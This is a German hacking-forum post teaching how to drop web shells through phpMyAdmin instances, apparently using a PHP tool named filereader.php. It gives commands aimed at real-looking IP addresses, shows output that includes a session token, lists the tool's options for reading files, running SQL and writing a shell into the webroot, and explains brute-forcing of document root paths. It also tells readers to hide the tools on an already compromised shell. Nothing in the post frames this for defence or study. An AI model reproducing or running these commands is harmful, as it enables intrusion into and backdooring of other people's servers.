Unix Shellen Tutorial (1 Viewer)

Schmeckmo

Schmeckmo

Joined
Jan 10, 2019
Credits
0
Rating - 0%
Vorab, ich möchte das dieses Tutorial und Tools ausschlielich auf spyhackerz.com bleiben, so haben wir mehr vom Kuchen!!

Ihr sucht euch als erstes eine Unix Shell, dort sucht ihr euch ein Safe Verzeichnis das nicht jeder andere Scanner sofort findet und die Tools klaut.
find / -type d -writable

Dort ladet ihr folgendes hoch http://xup.in/dl,17578992 , entpackt dieses.
Ihr bleibt in dem Verzeichniss, nicht in den Ordner Cookies wechseln.
Dann geht ihr auf Terminal und könnt folgendes Tutorial nutzen. Somit hat sich das erweitern der Docroot Liste auch erledigt weil man meistens die Verzeichnisse bruten muss.

Zuerst schauen wir mal nach, was wir über das System herausfinden können:

+[ 15:17:38 ]--> php filereader.php -r0 -thttp://78.46.154.136:80/myadmin

DocumentRoot "/usr/local/apache2/htdocs"
hier versuchen wir zu shellen:

+[ 15:18:44 ]--> php filereader.php -r0 -thttp://78.46.154.136:80/myadmin -f/usr/local/apache2/htdocs/x.php -x
Using proxy: no
Url: http://78.46.154.136:80/myadmin/index.php
Login: root:

Token: d1c5b8a2240f28cbe978cff62facbdb0

Datadir: /usr/local/mysql/data/
OS: linux
Stripslashes: off



======================================================================

Es gab keine Fehlermeldung, in diesem Fall konnte die Shell erfolgreich gedroppt werden.
--------------------------------------------
Beispiel 2:
Hier zeig ich kurz das brute-forcen von interessanten Verzeichnissen mittels "#":

+[ 14:51:42 ]--> php filereader.php -r0 -thttp://37.59.127.230:80/phpmyadmin -f/opt/lampp/htdocs/#/x.php -x

-f/var/www/#/x.php -x

________________________________--
usage: php filereader.php
options:
-t <url> - e.g. http://localhost:81/phpMyAdmin/
-u <username> - mysql username, default: root
-p <password> - mysql password, default: <empty>
-f <file> - optional: read single file then quit
-s <sql> - optional: perform custom sql command
-o <windows/linux> - optional: define linux/windows manually
-l <1/0> - optional: define stripslashes manually (1/0)
-c <1/0> - optional: use convert in sql or don't (1/0)
-x - optional: write sql shell into -f/file/name
-r <1/0> - optional: use proxy (default: yes)
-h - this help

use # in -fFilename to searchbrute

example:
php filereader.php -hhttp://localhost/mypma/ -uroot -p12345 -f/etc/issue
 
You must log in or register to reply here.

Users who are viewing this thread

Total: 2 (members: 0, guests: 2)
Top